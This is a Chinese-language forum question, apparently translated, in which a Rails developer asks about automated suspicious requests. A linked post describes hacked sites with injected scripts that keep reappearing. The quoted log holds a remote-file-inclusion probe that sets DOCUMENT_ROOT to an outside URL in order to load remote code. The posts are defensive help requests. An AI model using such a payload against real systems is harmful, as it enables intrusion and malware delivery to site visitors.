最近,我发现很多像这样的奇怪请求出现在我的 Rails 应用程序中:
Processing ApplicationController#index (for 189.30.242.61 at 2009-12-14 07:38:24) [GET]
Parameters: {"_SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt???"}}
ActionController::RoutingError (No route matches "/browse/brand/nike ///" with {:method=>:get}):
看起来它是自动化的,因为我收到了很多并注意到他们试图发送的奇怪参数:
_SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt???
这是恶意的吗?如果是,我该怎么办?
可能重复:
我的服务器被黑了 紧急情况
我的网站之一受到严重病毒感染。
在几个网页的页脚添加了一个额外的脚本。这些页面是 html 页面。并且他所有的 index.php 都有一个自动添加的 curl 脚本,它可以访问一些恶意代码,这些代码会下载到浏览网站的人身上。该脚本非常危险,如果没有防病毒软件,它会立即破坏访问人员系统。在这个网站上工作的开发者自己在过去 6 天内对系统进行了 5 次格式化。
情况变得更加严重,因为脚本在从受感染的文件中删除后不断返回。现在我们处于最糟糕的状态,它已经蔓延到开发人员在过去 6 个月内正在开发的所有 8-10 个网站。BTW:我们使用开源框架来开发这些网站,我们主要使用了 Magento、CakePHP、wordpress。
如果您能在此问题上提供帮助,请提供您以前的任何处理此类情况的经验或知识。
所有建议表示赞赏。
PS 如果你们需要,我可以在此处发布恶意脚本,该脚本已添加到我的 html 和 php 文件中。
编辑:是否有任何编程解决方案可以从网站中删除添加的恶意代码?